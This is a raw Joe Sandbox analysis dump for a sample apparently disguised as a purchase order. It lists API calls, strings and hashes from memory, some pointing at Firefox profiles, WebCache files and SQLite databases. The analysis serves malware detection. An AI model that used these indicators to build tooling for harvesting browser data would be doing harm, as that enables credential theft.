                                                              • Associated: 00000008.00000002.2668533992.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: memcpy
                                                              • String ID: BINARY$NOCASE$RTRIM$main$no such vfs: %s$temp
                                                              • API String ID: 3510742995-2641926074
                                                              • Opcode ID: 821e0fdd347fba4e0959882d1eed221cd0f9849de050a87fd0c537b7ccc40074
                                                              • Instruction ID: 565814064bb2237b40e40c3ad6633df45ffc5137317807aec9a32ad89077b3bf
                                                              • Opcode Fuzzy Hash: 821e0fdd347fba4e0959882d1eed221cd0f9849de050a87fd0c537b7ccc40074
                                                              • Instruction Fuzzy Hash: BA7119B1600701BFE710AF16CC81B66B7A8BB85319F11452FF4189B742D7BDED908B99
                                                              APIs
                                                                • Part of subcall function 0040B633: free.MSVCRT ref: 0040B63A
                                                                • Part of subcall function 0044553B: memset.MSVCRT ref: 004455C2
                                                                • Part of subcall function 0044553B: wcsrchr.MSVCRT ref: 004455DA
                                                              • memset.MSVCRT ref: 004033B7
                                                              • memcpy.MSVCRT(?,00000000,0000121C), ref: 004033D0
                                                              • wcscmp.MSVCRT ref: 004033FC
                                                              • _wcsicmp.MSVCRT ref: 00403439
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.2668533992.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000008.00000002.2668533992.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: memset$_wcsicmpfreememcpywcscmpwcsrchr
                                                              • String ID: $0.@
                                                              • API String ID: 2758756878-1896041820
                                                              • Opcode ID: 90c1bd1f00aab923b8f25d437f952d518439630af4329cefc1ee53129d619d56
                                                              • Instruction ID: ab192eb15c9642abc1a13bae453f9d52c7669558764b377fc560e22e349fc473
                                                              • Opcode Fuzzy Hash: 90c1bd1f00aab923b8f25d437f952d518439630af4329cefc1ee53129d619d56
                                                              • Instruction Fuzzy Hash: 6B414A71A0C3819BD770EF65C885A8BB7E8AF86314F004D2FE48C97681DB3899458B5B
                                                              APIs
                                                                • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(C:\Windows\system32,00000104), ref: 0040A841
                                                                • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000), ref: 0040A87B
                                                                • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                                                              • GetProcAddress.KERNEL32(00000000,00000000), ref: 004449E7
                                                              • GetProcAddress.KERNEL32(00000000,00000000), ref: 004449F8
                                                              • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A09
                                                              • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A1A
                                                              • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A2B
                                                              • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A3C
                                                              • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A4D
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.2668533992.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000008.00000002.2668533992.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: AddressProc$LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                                                              • String ID:
                                                              • API String ID: 2941347001-0
                                                              • Opcode ID: 80e482451f5ca37e8404f50e4d067f365766b265f7642500ec0655012d68ebd6
                                                              • Instruction ID: 45112ec7679d7541be2eaee67b01953ccf91f0241e5cd71b41190719d78dca83
                                                              • Opcode Fuzzy Hash: 80e482451f5ca37e8404f50e4d067f365766b265f7642500ec0655012d68ebd6
                                                              • Instruction Fuzzy Hash: 2E115871840700EDEA207F72DD0FF2B7AA5EF40B14F10882EF555594E1EBB6A8119E9C
                                                              APIs
                                                              • memset.MSVCRT ref: 00403C09
                                                              • memset.MSVCRT ref: 00403C1E
                                                                • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                                • Part of subcall function 00409719: wcslen.MSVCRT ref: 0040971A
                                                                • Part of subcall function 00409719: wcscat.MSVCRT ref: 00409732
                                                              • wcscat.MSVCRT ref: 00403C47
                                                                • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                              • wcscat.MSVCRT ref: 00403C70
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.2668533992.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000008.00000002.2668533992.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: memsetwcscat$CloseFolderPathSpecialwcscpywcslen
                                                              • String ID: Mozilla\Firefox\Profiles$Mozilla\Profiles
                                                              • API String ID: 1534475566-1174173950
                                                              • Opcode ID: 8452d1ff202b3ecdc32f03c4689b339ff6508c8f38893fabe83067ed25a4ac21
                                                              • Instruction ID: 5219a381a5be6f9fff484f4b9c8ff18b49dc44b18064e24db21ac924a7a96902
                                                              • Opcode Fuzzy Hash: 8452d1ff202b3ecdc32f03c4689b339ff6508c8f38893fabe83067ed25a4ac21
                                                              • Instruction Fuzzy Hash: 4401A9B294032C76DB207B669C86ECF672C9F45358F01447FB504B7182D9785E844AA9
                                                              APIs
                                                                • Part of subcall function 00414B81: GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathW), ref: 00414BA4
                                                              • SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                              • memset.MSVCRT ref: 00414C87
                                                              • RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                              • wcscpy.MSVCRT ref: 00414CFC
                                                                • Part of subcall function 00409CEA: GetVersionExW.KERNEL32(0045D340,0000001A,00414C4F,?,00000000), ref: 00409D04
                                                              Strings
                                                              • Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 00414CA2, 00414CB2
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.2668533992.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000008.00000002.2668533992.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: AddressCloseFolderPathProcSpecialVersionmemsetwcscpy
                                                              • String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
                                                              • API String ID: 71295984-2036018995
                                                              • Opcode ID: f400cfab40eb781a7377af97b809c3f02e1ff83a00fe342fd0a4f0569afe9d8a
                                                              • Instruction ID: cfba8ba70a3d5c5eb0df7add68d4968905301debfffe1ddd107e81ced3c7690c
                                                              • Opcode Fuzzy Hash: f400cfab40eb781a7377af97b809c3f02e1ff83a00fe342fd0a4f0569afe9d8a
                                                              • Instruction Fuzzy Hash: EE110B31802224ABDB24A7999C4E9EF736CDBD1315F2200A7F80562151F6685EC5C6DE
                                                              APIs
                                                              • wcschr.MSVCRT ref: 00414458
                                                              • _snwprintf.MSVCRT ref: 0041447D
                                                              • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 0041449B
                                                              • GetPrivateProfileStringW.KERNEL32(?,?,?,?,?,?), ref: 004144B3
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.2668533992.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000008.00000002.2668533992.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: PrivateProfileString$Write_snwprintfwcschr
                                                              • String ID: "%s"
                                                              • API String ID: 1343145685-3297466227
                                                              • Opcode ID: aabbe202c5f79078aea71dac5ab2605718744c8b92afc7520f4e067a7367162e
                                                              • Instruction ID: 05c1b6e2b8d8aed92df8b5d38884bf02313f678dea9e3ece4dcd1a0b753c0483
                                                              • Opcode Fuzzy Hash: aabbe202c5f79078aea71dac5ab2605718744c8b92afc7520f4e067a7367162e
                                                              • Instruction Fuzzy Hash: 7201AD3240421ABBEF219F81DC09FDB3F6AFF09305F14806ABA08501A1D339C5A5EB58
                                                              APIs
                                                              • GetModuleHandleW.KERNEL32(kernel32.dll,?,00413EA2,?,?,?,?,?,00000000,?), ref: 00413CB5
                                                              • GetProcAddress.KERNEL32(00000000,GetProcessTimes), ref: 00413CCF
                                                              • GetProcessTimes.KERNELBASE(00000000,?,?,?,?,?,00413EA2,?,?,?,?,?,00000000,?), ref: 00413CF2
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.2668533992.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000008.00000002.2668533992.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: AddressHandleModuleProcProcessTimes
                                                              • String ID: GetProcessTimes$kernel32.dll
                                                              • API String ID: 1714573020-3385500049
                                                              • Opcode ID: 3d2a63fc8b7889f90c1cc675bbb66959c3424aca663c91e440c9d47c6094dacc
                                                              • Instruction ID: 0a9fc9a7fb2a98cd878f934f387e3824ef844cc6c25aa3dbb33b58617c33e237
                                                              • Opcode Fuzzy Hash: 3d2a63fc8b7889f90c1cc675bbb66959c3424aca663c91e440c9d47c6094dacc
                                                              • Instruction Fuzzy Hash: F5F03036204309AFEF008FA6FD06B963BA8BB04742F044066FA0CD1561D7B5D6B0EF99
                                                              APIs
                                                              • memset.MSVCRT ref: 004087D6
                                                                • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                                                                • Part of subcall function 004095D9: memset.MSVCRT ref: 004095FC
                                                              • memset.MSVCRT ref: 00408828
                                                              • memset.MSVCRT ref: 00408840
                                                              • memset.MSVCRT ref: 00408858
                                                              • memset.MSVCRT ref: 00408870
                                                              • memset.MSVCRT ref: 00408888
                                                                • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,0040DAEA,?,0040DBA1,00000000,?,00000000,00000208,?), ref: 00409B9C
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.2668533992.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000008.00000002.2668533992.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: memset$wcslen$AttributesByteCharFileMultiWidewcscatwcscpy
                                                              • String ID:
                                                              • API String ID: 2911713577-0
                                                              • Opcode ID: 6684bba834465d20886231ffe2d62564197a18c1a2325da43f028315e65dbcab
                                                              • Instruction ID: a7e5ca25de4111a2a05fe91eb9e7b9268c7acadad77a1a504b595fc773a76dc1
                                                              • Opcode Fuzzy Hash: 6684bba834465d20886231ffe2d62564197a18c1a2325da43f028315e65dbcab
                                                              • Instruction Fuzzy Hash: BD5146B280011D7EEB50E751DC46EEF776CDF05318F0040BEB948B6182EA745F948BA9
                                                              APIs
                                                              • memcmp.MSVCRT(?,?,00000004,?,00000065,004381DF,00000065,00000000,00000007,?,00000000), ref: 0041F202
                                                              • memcmp.MSVCRT(?,SQLite format 3,00000010,?,00000065,004381DF,00000065,00000000), ref: 0041F22D
                                                              • memcmp.MSVCRT(?,@ ,00000003,?,?,00000065,004381DF,00000065,00000000), ref: 0041F299
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.2668533992.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000008.00000002.2668533992.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: memcmp
                                                              • String ID: @ $SQLite format 3
                                                              • API String ID: 1475443563-3708268960
                                                              • Opcode ID: bc797f5c287fbec082bfe36368e8bdb92b626008a1b8340b8f00afaa449410d4
                                                              • Instruction ID: a5e199d7c3355b23248e204991ed7883f9cb1cefd3641e4a8180bf992d12f390
                                                              • Opcode Fuzzy Hash: bc797f5c287fbec082bfe36368e8bdb92b626008a1b8340b8f00afaa449410d4
                                                              • Instruction Fuzzy Hash: 9051C1719002199BDF10DFA9C4817DEB7F4AF44314F1541AAEC14EB246E778EA8ACB88
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.2668533992.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000008.00000002.2668533992.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: _wcsicmpqsort
                                                              • String ID: /nosort$/sort
                                                              • API String ID: 1579243037-1578091866
                                                              • Opcode ID: a0f12cb90dd745c164ef67684cb79943b88980d13b6e843c418957b63f9314a7
                                                              • Instruction ID: 59a4a6edbc2c6816dd96362f3638b70d105e8990563e463c72bda517b6347aa4
                                                              • Opcode Fuzzy Hash: a0f12cb90dd745c164ef67684cb79943b88980d13b6e843c418957b63f9314a7
                                                              • Instruction Fuzzy Hash: C8213770700201AFD714FB36C880E96F3AAFF58314F11012EE61897692DB39BC918B4A
                                                              APIs
                                                              • memset.MSVCRT ref: 0040E60F
                                                              • memset.MSVCRT ref: 0040E629
                                                                • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                                • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,0040DAEA,?,0040DBA1,00000000,?,00000000,00000208,?), ref: 00409B9C
                                                              Strings
                                                              • Microsoft\Windows\WebCache\WebCacheV01.dat, xrefs: 0040E647
                                                              • Microsoft\Windows\WebCache\WebCacheV24.dat, xrefs: 0040E66F
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.2668533992.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000008.00000002.2668533992.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: memsetwcslen$AttributesFileFolderPathSpecialwcscatwcscpy
                                                              • String ID: Microsoft\Windows\WebCache\WebCacheV01.dat$Microsoft\Windows\WebCache\WebCacheV24.dat
                                                              • API String ID: 2887208581-2114579845
                                                              • Opcode ID: 45b77cc57d7adabb6b76daf53bfb3be083a41c4971f5e6ab387fbe8a56a2d209
                                                              • Instruction ID: 2f29c334d396001d9fe1cebc89c879271eb53039ccc8e03d5a3365d75131e7c5
                                                              • Opcode Fuzzy Hash: 45b77cc57d7adabb6b76daf53bfb3be083a41c4971f5e6ab387fbe8a56a2d209
                                                              • Instruction Fuzzy Hash: 66118AB3D4012C66EB10E755EC85FDB73ACAF14319F1408B7B904F11C2E6B89F984998
                                                              APIs
                                                              • FindResourceW.KERNELBASE(?,?,?), ref: 004148C3
                                                              • SizeofResource.KERNEL32(?,00000000), ref: 004148D4
                                                              • LoadResource.KERNEL32(?,00000000), ref: 004148E4
                                                              • LockResource.KERNEL32(00000000), ref: 004148EF
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.2668533992.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000008.00000002.2668533992.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: Resource$FindLoadLockSizeof
                                                              • String ID:
                                                              • API String ID: 3473537107-0
                                                              • Opcode ID: 6eac18842e5c85fe8f5858b83388748d76eef83a8f56414f10f835c55d74c1c4
                                                              • Instruction ID: 8a72e2f5d7590eb6bb033c3ed88c96ec9d5eb8bcd973c23d1c6560583cb0a60d
                                                              • Opcode Fuzzy Hash: 6eac18842e5c85fe8f5858b83388748d76eef83a8f56414f10f835c55d74c1c4
                                                              • Instruction Fuzzy Hash: 0101D2727402156B8B294FB6DD4999BBFAEFFC6391308803AF809D6331DA31C851C688
                                                              APIs
                                                              • ??3@YAXPAX@Z.MSVCRT(02250048), ref: 0044DF01
                                                              • ??3@YAXPAX@Z.MSVCRT(02260050), ref: 0044DF11
                                                              • ??3@YAXPAX@Z.MSVCRT(00AA6E08), ref: 0044DF21
                                                              • ??3@YAXPAX@Z.MSVCRT(02260458), ref: 0044DF31
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.2668533992.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000008.00000002.2668533992.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: ??3@
                                                              • String ID:
                                                              • API String ID: 613200358-0
                                                              • Opcode ID: 51118905c2728d810469e0c59db0571482045495d4d228400e43909190034b47
                                                              • Instruction ID: aa45652f999bbb0892b85dcd7393972dd4dfe4e89c7b59a5f1a68188070d07e1
                                                              • Opcode Fuzzy Hash: 51118905c2728d810469e0c59db0571482045495d4d228400e43909190034b47
                                                              • Instruction Fuzzy Hash: 5EE08C60F0830052BA31EBBABD40E2723EC5E1AB4271A842FB905C3282CE2CC880C02D
                                                              APIs
                                                              Strings
                                                              • only a single result allowed for a SELECT that is part of an expression, xrefs: 0043AAD3
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.2668533992.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000008.00000002.2668533992.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: memset
                                                              • String ID: only a single result allowed for a SELECT that is part of an expression
                                                              • API String ID: 2221118986-1725073988
                                                              • Opcode ID: d115b1de85cb0c2c74241db9f2e26d4ca9f76d3b3ab36ed3aa85b1754c3cbe0d
                                                              • Instruction ID: 0c5fbdb45af1b87466ede92b40025f4dfba1e1eb7e0419b48c64bc8603b8f36f
                                                              • Opcode Fuzzy Hash: d115b1de85cb0c2c74241db9f2e26d4ca9f76d3b3ab36ed3aa85b1754c3cbe0d
                                                              • Instruction Fuzzy Hash: 5D827A71608340AFD720DF15C881B1BBBE1FF88318F14491EFA9987262D779E954CB96
                                                              APIs
                                                              • ??3@YAXPAX@Z.MSVCRT(?,00000000,00412966,/deleteregkey,/savelangfile,?,?,?,?,00000002,?,0044688C,00000000,?,0000000A), ref: 004125C3
                                                              • DeleteObject.GDI32(00000000), ref: 004125E7
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.2668533992.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000008.00000002.2668533992.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: ??3@DeleteObject
                                                              • String ID: r!A
                                                              • API String ID: 1103273653-628097481
                                                              • Opcode ID: 35011d0761a793af9b86058f165b74ada9e8dfd6de6a99c5cda2ffee1e56a26e
                                                              • Instruction ID: d381ae2e1f6c469d4091c7bd434485f036f098756071eb86a226830a39d2e28c
                                                              • Opcode Fuzzy Hash: 35011d0761a793af9b86058f165b74ada9e8dfd6de6a99c5cda2ffee1e56a26e
                                                              • Instruction Fuzzy Hash: 72E04F75000302DFD7115F26E400782B7F5FF85315F11455EE89497151EBB96164CE19
                                                              APIs
                                                              • ??2@YAPAXI@Z.MSVCRT(00000000,0040D142,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D0CC
                                                              • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,0040D142,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D0EA
                                                              • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00000000,0040D142,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D108
                                                              • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00000000,00000000,0040D142,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D126
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.2668533992.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000008.00000002.2668533992.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: ??2@
                                                              • String ID:
                                                              • API String ID: 1033339047-0
                                                              • Opcode ID: bb5a2cedd882201272bd117211a6380788fbbee7b2a1ea69d9384cb42441e8af
                                                              • Instruction ID: 5f4fc1bc6a90e200713bb7744dd8ab6a017b0cf4e98027731d5581fdeff4b0c3
                                                              • Opcode Fuzzy Hash: bb5a2cedd882201272bd117211a6380788fbbee7b2a1ea69d9384cb42441e8af
                                                              • Instruction Fuzzy Hash: B00121B2A413005EEB7ADF38EE5772966A0AF4C351F01453EA246CD1F6EEF58480CB49
                                                              APIs
                                                                • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 004449E7
                                                                • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 004449F8
                                                                • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A09
                                                                • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A1A
                                                                • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A2B
                                                                • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A3C
                                                                • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A4D
                                                              • memcmp.MSVCRT(?,0044EC68,00000010,?,00000000,?), ref: 00444BA5
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.2668533992.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000008.00000002.2668533992.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: AddressProc$memcmp
                                                              • String ID: $$8
                                                              • API String ID: 2808797137-435121686
                                                              • Opcode ID: e80885fdbb6a557c0c44277052daa68a3f3074bd67b4db13da85d3ecc8de475b
                                                              • Instruction ID: 2c4e4273d6b09173b98ec99ba1a72f96ebc6587eba5c15334d9e54441f883a66
